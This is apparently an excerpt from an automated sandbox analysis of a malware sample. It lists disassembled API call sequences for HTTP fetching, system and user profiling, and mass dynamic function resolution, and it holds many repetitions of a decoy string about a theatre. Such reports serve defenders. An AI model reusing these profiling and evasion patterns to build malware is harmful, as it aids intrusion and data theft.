                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684688
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006847CB
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068476E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846B2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684667
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684728
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684763
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684693
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068471D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684707
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684712
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846FC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068467D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068479F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846A7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684784
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006847AA
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846BD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684779
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846C8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006847C0
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00684672
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006847B5
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006846D3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0068478F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: a81d05cd8638580f9db8d2126d3134f056d3ceba72e87563ac11e2cfaaacd55d
                                    • Instruction ID: 52c0697fe6f5a4b4df179c37745aeb59c3798d53b200952b04644b148912a4b0
                                    • Opcode Fuzzy Hash: a81d05cd8638580f9db8d2126d3134f056d3ceba72e87563ac11e2cfaaacd55d
                                    • Instruction Fuzzy Hash: 9D41BD707C270C7BC624FBAC888EE9D76B79F4B700F596148AA13562C2CBB06D404E66

                                    Control-flow Graph (rendered graph not reproduced; basic blocks 6862d0-68657d, WinINet GET request with InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, HttpQueryInfoA and InternetReadFile)
                                    APIs
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 00684800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684889
                                      • Part of subcall function 00684800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684899
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • InternetOpenA.WININET(006A0DFF,00000001,00000000,00000000,00000000), ref: 00686331
                                    • StrCmpCA.SHLWAPI(?,0142E2C0), ref: 00686353
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686385
                                    • HttpOpenRequestA.WININET(00000000,GET,?,0142D6B0,00000000,00000000,00400100,00000000), ref: 006863D5
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0068640F
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00686421
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0068644D
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006864BD
                                    • InternetCloseHandle.WININET(00000000), ref: 0068653F
                                    • InternetCloseHandle.WININET(00000000), ref: 00686549
                                    • InternetCloseHandle.WININET(00000000), ref: 00686553
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: e48874a8eb41b7087de91d32baef0c4e49dfd02c2f732d14a960591d18f09c57
                                    • Instruction ID: dd6e39fa9beb876a344aef583e85e2c4e59533334fa0c7d5488fedda0fedf460
                                    • Opcode Fuzzy Hash: e48874a8eb41b7087de91d32baef0c4e49dfd02c2f732d14a960591d18f09c57
                                    • Instruction Fuzzy Hash: 92716071A04318ABDF24EFD0DC55FEEB7BAAB44700F108198F1066B594DBB06A84CF55

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1356 697690-6976da GetWindowsDirectoryA 1357 6976dc 1356->1357 1358 6976e3-697757 GetVolumeInformationA call 698e90 * 3 1356->1358 1357->1358 1365 697768-69776f 1358->1365 1366 69778c-6977a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 697771-69778a call 698e90 1365->1367 1368 6977a9-6977b6 call 69aa50 1366->1368 1369 6977b8-6977e8 wsprintfA call 69aa50 1366->1369 1367->1365 1377 69780e-69781e 1368->1377 1369->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 006976D2
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0069770F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697793
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0069779A
                                    • wsprintfA.USER32 ref: 006977D0
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: 7414a451ee1560dcbd362a5c6daca65ba49dc6fa01f0e4b18caa327bd2ad0bf7
                                    • Instruction ID: 017037a249ea8f16e451dcaee0dc49cfea5fb575808d66e6f1a99d2b3cf81fa1
                                    • Opcode Fuzzy Hash: 7414a451ee1560dcbd362a5c6daca65ba49dc6fa01f0e4b18caa327bd2ad0bf7
                                    • Instruction Fuzzy Hash: 8341A3B1D18348ABDF10DF94DC85BDEBBB9AF08704F100099F609AB680D7756B44CBA5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697A10
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00697A17
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00697A2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 25e0953991751fc0c659d6a1922e1e9f45d43755613f48a2f34b5c6dac30368b
                                    • Instruction ID: 47d93450cac80ed5d28d6f35bb8316f492d644e735b83ef5eae6d67bec448942
                                    • Opcode Fuzzy Hash: 25e0953991751fc0c659d6a1922e1e9f45d43755613f48a2f34b5c6dac30368b
                                    • Instruction Fuzzy Hash: 36F04FB1958309EFCB00DFD9ED45BAEFBBCEB05711F10021AF615A2680C7751A008BA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 472ad8a4a0dfc1ca8b4d54486fd3ae4d6c54a8222f45c88c002ba3861ca551da
                                    • Instruction ID: fe2f17a10795040539fcb107e2bee7f3ee1571f7f7f92ef35a6e702ccf219dfd
                                    • Opcode Fuzzy Hash: 472ad8a4a0dfc1ca8b4d54486fd3ae4d6c54a8222f45c88c002ba3861ca551da
                                    • Instruction Fuzzy Hash: BBD05E7490C30C9BCB00EFE1A8896DDBB78BB08216F000594D90562340EA306581CB65

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 699f20-699f2a 634 699f30-69a341 GetProcAddress * 43 633->634 635 69a346-69a3da LoadLibraryA * 8 633->635 634->635 636 69a3dc-69a451 GetProcAddress * 5 635->636 637 69a456-69a45d 635->637 636->637 638 69a463-69a521 GetProcAddress * 8 637->638 639 69a526-69a52d 637->639 638->639 640 69a5a8-69a5af 639->640 641 69a52f-69a5a3 GetProcAddress * 5 639->641 642 69a5b5-69a642 GetProcAddress * 6 640->642 643 69a647-69a64e 640->643 641->640 642->643 644 69a72f-69a736 643->644 645 69a654-69a72a GetProcAddress * 9 643->645 646 69a738-69a7ad GetProcAddress * 5 644->646 647 69a7b2-69a7b9 644->647 645->644 646->647 648 69a7bb-69a7e7 GetProcAddress * 2 647->648 649 69a7ec-69a7f3 647->649 648->649 650 69a825-69a82c 649->650 651 69a7f5-69a820 GetProcAddress * 2 649->651 652 69a922-69a929 650->652 653 69a832-69a91d GetProcAddress * 10 650->653 651->650 654 69a92b-69a988 GetProcAddress * 4 652->654 655 69a98d-69a994 652->655 653->652 654->655 656 69a9ae-69a9b5 655->656 657 69a996-69a9a9 GetProcAddress 655->657 658 69aa18-69aa19 656->658 659 69a9b7-69aa13 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,014167C0), ref: 00699F3D
                                    • GetProcAddress.KERNEL32(75900000,014168C0), ref: 00699F55
                                    • GetProcAddress.KERNEL32(75900000,014294E8), ref: 00699F6E
                                    • GetProcAddress.KERNEL32(75900000,01429260), ref: 00699F86
                                    • GetProcAddress.KERNEL32(75900000,0142CDA8), ref: 00699F9E
                                    • GetProcAddress.KERNEL32(75900000,0142CC88), ref: 00699FB7
                                    • GetProcAddress.KERNEL32(75900000,0141B1F8), ref: 00699FCF
                                    • GetProcAddress.KERNEL32(75900000,0142CCE8), ref: 00699FE7
                                    • GetProcAddress.KERNEL32(75900000,0142CD48), ref: 0069A000
                                    • GetProcAddress.KERNEL32(75900000,0142CD00), ref: 0069A018
                                    • GetProcAddress.KERNEL32(75900000,0142CCD0), ref: 0069A030
                                    • GetProcAddress.KERNEL32(75900000,014169A0), ref: 0069A049
                                    • GetProcAddress.KERNEL32(75900000,01416900), ref: 0069A061
                                    • GetProcAddress.KERNEL32(75900000,01416680), ref: 0069A079
                                    • GetProcAddress.KERNEL32(75900000,014166C0), ref: 0069A092
                                    • GetProcAddress.KERNEL32(75900000,0142CC40), ref: 0069A0AA
                                    • GetProcAddress.KERNEL32(75900000,0142CDC0), ref: 0069A0C2
                                    • GetProcAddress.KERNEL32(75900000,0141B130), ref: 0069A0DB
                                    • GetProcAddress.KERNEL32(75900000,014166E0), ref: 0069A0F3
                                    • GetProcAddress.KERNEL32(75900000,0142CD30), ref: 0069A10B
                                    • GetProcAddress.KERNEL32(75900000,0142CCA0), ref: 0069A124
                                    • GetProcAddress.KERNEL32(75900000,0142CD18), ref: 0069A13C
                                    • GetProcAddress.KERNEL32(75900000,0142CC58), ref: 0069A154
                                    • GetProcAddress.KERNEL32(75900000,01416700), ref: 0069A16D
                                    • GetProcAddress.KERNEL32(75900000,0142CD60), ref: 0069A185
                                    • GetProcAddress.KERNEL32(75900000,0142CC10), ref: 0069A19D
                                    • GetProcAddress.KERNEL32(75900000,0142CCB8), ref: 0069A1B6
                                    • GetProcAddress.KERNEL32(75900000,0142CD78), ref: 0069A1CE
                                    • GetProcAddress.KERNEL32(75900000,0142CD90), ref: 0069A1E6
                                    • GetProcAddress.KERNEL32(75900000,0142CC28), ref: 0069A1FF
                                    • GetProcAddress.KERNEL32(75900000,0142CC70), ref: 0069A217
                                    • GetProcAddress.KERNEL32(75900000,0142C808), ref: 0069A22F
                                    • GetProcAddress.KERNEL32(75900000,0142C760), ref: 0069A248
                                    • GetProcAddress.KERNEL32(75900000,0141F610), ref: 0069A260
                                    • GetProcAddress.KERNEL32(75900000,0142C6D0), ref: 0069A278
                                    • GetProcAddress.KERNEL32(75900000,0142C7A8), ref: 0069A291
                                    • GetProcAddress.KERNEL32(75900000,01416760), ref: 0069A2A9
                                    • GetProcAddress.KERNEL32(75900000,0142C868), ref: 0069A2C1
                                    • GetProcAddress.KERNEL32(75900000,014167A0), ref: 0069A2DA
                                    • GetProcAddress.KERNEL32(75900000,0142C730), ref: 0069A2F2
                                    • GetProcAddress.KERNEL32(75900000,0142C700), ref: 0069A30A
                                    • GetProcAddress.KERNEL32(75900000,01416500), ref: 0069A323
                                    • GetProcAddress.KERNEL32(75900000,014164C0), ref: 0069A33B
                                    • LoadLibraryA.KERNEL32(0142C658,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A34D
                                    • LoadLibraryA.KERNEL32(0142C628,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A35E
                                    • LoadLibraryA.KERNEL32(0142C8B0,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A370
                                    • LoadLibraryA.KERNEL32(0142C778,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A382
                                    • LoadLibraryA.KERNEL32(0142C6E8,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A393
                                    • LoadLibraryA.KERNEL32(0142C670,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A3A5
                                    • LoadLibraryA.KERNEL32(0142C8E0,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A3B7
                                    • LoadLibraryA.KERNEL32(0142C7C0,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A3C8
                                    • GetProcAddress.KERNEL32(75FD0000,014164E0), ref: 0069A3EA
                                    • GetProcAddress.KERNEL32(75FD0000,0142C640), ref: 0069A402
                                    • GetProcAddress.KERNEL32(75FD0000,01429148), ref: 0069A41A
                                    • GetProcAddress.KERNEL32(75FD0000,0142C790), ref: 0069A433
                                    • GetProcAddress.KERNEL32(75FD0000,014164A0), ref: 0069A44B
                                    • GetProcAddress.KERNEL32(73550000,0141B248), ref: 0069A470
                                    • GetProcAddress.KERNEL32(73550000,014163E0), ref: 0069A489
                                    • GetProcAddress.KERNEL32(73550000,0141B0E0), ref: 0069A4A1
                                    • GetProcAddress.KERNEL32(73550000,0142C688), ref: 0069A4B9
                                    • GetProcAddress.KERNEL32(73550000,0142C6A0), ref: 0069A4D2
                                    • GetProcAddress.KERNEL32(73550000,014165A0), ref: 0069A4EA
                                    • GetProcAddress.KERNEL32(73550000,014163A0), ref: 0069A502
                                    • GetProcAddress.KERNEL32(73550000,0142C8F8), ref: 0069A51B
                                    • GetProcAddress.KERNEL32(763B0000,01416380), ref: 0069A53C
                                    • GetProcAddress.KERNEL32(763B0000,01416280), ref: 0069A554
                                    • GetProcAddress.KERNEL32(763B0000,0142C8C8), ref: 0069A56D
                                    • GetProcAddress.KERNEL32(763B0000,0142C610), ref: 0069A585
                                    • GetProcAddress.KERNEL32(763B0000,01416480), ref: 0069A59D
                                    • GetProcAddress.KERNEL32(750F0000,0141B270), ref: 0069A5C3
                                    • GetProcAddress.KERNEL32(750F0000,0141AFC8), ref: 0069A5DB
                                    • GetProcAddress.KERNEL32(750F0000,0142C880), ref: 0069A5F3
                                    • GetProcAddress.KERNEL32(750F0000,01416320), ref: 0069A60C
                                    • GetProcAddress.KERNEL32(750F0000,01416520), ref: 0069A624
                                    • GetProcAddress.KERNEL32(750F0000,0141B298), ref: 0069A63C
                                    • GetProcAddress.KERNEL32(75A50000,0142C718), ref: 0069A662
                                    • GetProcAddress.KERNEL32(75A50000,01416420), ref: 0069A67A
                                    • GetProcAddress.KERNEL32(75A50000,01429058), ref: 0069A692
                                    • GetProcAddress.KERNEL32(75A50000,0142C838), ref: 0069A6AB
                                    • GetProcAddress.KERNEL32(75A50000,0142C6B8), ref: 0069A6C3
                                    • GetProcAddress.KERNEL32(75A50000,014165C0), ref: 0069A6DB
                                    • GetProcAddress.KERNEL32(75A50000,01416640), ref: 0069A6F4
                                    • GetProcAddress.KERNEL32(75A50000,0142C748), ref: 0069A70C
                                    • GetProcAddress.KERNEL32(75A50000,0142C7D8), ref: 0069A724
                                    • GetProcAddress.KERNEL32(75070000,01416340), ref: 0069A746
                                    • GetProcAddress.KERNEL32(75070000,0142C7F0), ref: 0069A75E
                                    • GetProcAddress.KERNEL32(75070000,0142C820), ref: 0069A776
                                    • GetProcAddress.KERNEL32(75070000,0142C850), ref: 0069A78F
                                    • GetProcAddress.KERNEL32(75070000,0142C898), ref: 0069A7A7
                                    • GetProcAddress.KERNEL32(74E50000,01416540), ref: 0069A7C8
                                    • GetProcAddress.KERNEL32(74E50000,01416560), ref: 0069A7E1
                                    • GetProcAddress.KERNEL32(75320000,01416400), ref: 0069A802
                                    • GetProcAddress.KERNEL32(75320000,0142CA30), ref: 0069A81A
                                    • GetProcAddress.KERNEL32(6F060000,014162A0), ref: 0069A840
                                    • GetProcAddress.KERNEL32(6F060000,01416660), ref: 0069A858
                                    • GetProcAddress.KERNEL32(6F060000,01416440), ref: 0069A870
                                    • GetProcAddress.KERNEL32(6F060000,0142CBB0), ref: 0069A889
